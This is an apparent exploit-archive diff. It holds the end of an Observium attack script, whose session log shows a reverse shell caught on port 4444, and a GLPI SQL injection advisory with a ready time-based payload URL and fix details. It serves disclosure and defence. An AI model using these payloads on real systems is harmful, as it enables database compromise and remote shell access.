+password = '123456'
+timeout = 10
+
+try:
+    cj = cookielib.CookieJar()
+    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
+    login_data = urllib.urlencode({'username' : username, 'password' : password, 'submit' : ''})
+    opener.open('http://observium-server', login_data, timeout=timeout)
+    url = 'http://observium-server/netcmd.php?cmd=whois&query=8.8.8.8'
+    resp = opener.open(url)
+
+except Exception, e:
+    print e
+    sys.exit(1)
+"""
+
+listening on [any] 4444 ...
+192.168.2.155: inverse host lookup failed: Unknown host
+connect to [192.168.2.222] from (UNKNOWN) [192.168.2.155] 52413
+bash: no job control in this shell
+bash: /root/.bashrc: Permission denied
+bash-4.1$ ls -l /opt
+ls -l /opt
+total 48944
+drwxrwxr-x  12 1000 1000     4096 Apr 27 13:47 observium
+-rw-r--r--   1 root root 50107191 Jan 27 07:35 observium-community-latest.tar.gz
+drwxr-xr-x.  2 root root     4096 Mar 26  2015 rh
+
+
--- a/platforms/php/webapps/39751.txt
+++ b/platforms/php/webapps/39751.txt
@ -0,0 +1,57 @@
+Advisory ID: HTB23301
+Product: GLPI
+Vendor: INDEPNET 
+Vulnerable Version(s): 0.90.2 and probably prior
+Tested Version: 0.90.2
+Advisory Publication: April 8, 2016 [without technical details]
+Vendor Notification: April 8, 2016 
+Vendor Patch: April 11, 2016 
+Public Disclosure: April 29, 2016 
+Vulnerability Type: SQL Injection [CWE-89]
+Risk Level: High 
+CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L]
+Solution Status: Fixed by Vendor
+Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
+
+------------------------------------------------------------------------
+-----------------------
+
+Advisory Details:
+
+High-Tech Bridge Security Research Lab discovered a high-risk SQL injection vulnerability in a popular Information Resource Manager (IRM) system GLPI. IRM systems are usually used for management and audit of software packages, providing ITIL-compliant service desk. The vulnerability allows remote non-authenticated attacker to execute arbitrary SQL queries, read and write data to the application's database and completely compromise the vulnerable system.
+
+The vulnerability exists due to insufficient filtration of user-supplied data passed via the "page_limit" HTTP GET parameter to "/ajax/getDropdownConnect.php" PHP script. A remote unauthenticated attacker can alter present SQL query, inject and execute arbitrary SQL command in application's database.
+
+Below is a simple SQL Injection exploit, which uses time-based exploitation technique. The page will load time will be significantly higher if MySQL version is 5.X or superior:
+
+http://[host]/ajax/getDropdownConnect.php?fromtype=Computer&itemtype=Com
+puter&page=1&page_limit=1%20PROCEDURE%20analyse%28%28select%20extractval
+ue%28rand%28%29,concat%280x3a,%28IF%28MID%28version%28%29,1,1%29%20LIKE%
+205,%20BENCHMARK%285000000,SHA1%281%29%29,1%29%29%29%29%29,1%29
+
+------------------------------------------------------------------------
+-----------------------
+
+Solution:
+
+Update to GLPI 0.90.3
+
+More Information:
+http://www.glpi-project.org/spip.php?page=annonce&id_breve=358&lang=en
+https://github.com/glpi-project/glpi/issues/581
+
+------------------------------------------------------------------------
+-----------------------
+
+References:
+
+[1] High-Tech Bridge Advisory HTB23301 - https://www.htbridge.com/advisory/HTB23301 - SQL Injection in GLPI.
+[2] GLPI - http://www.glpi-project.org - GLPI is the Information Resource Manager with an additional Administration Interface.
+[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
+[4] ImmuniWebÂ® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
+[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
+
+------------------------------------------------------------------------
+-----------------------
+
+Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.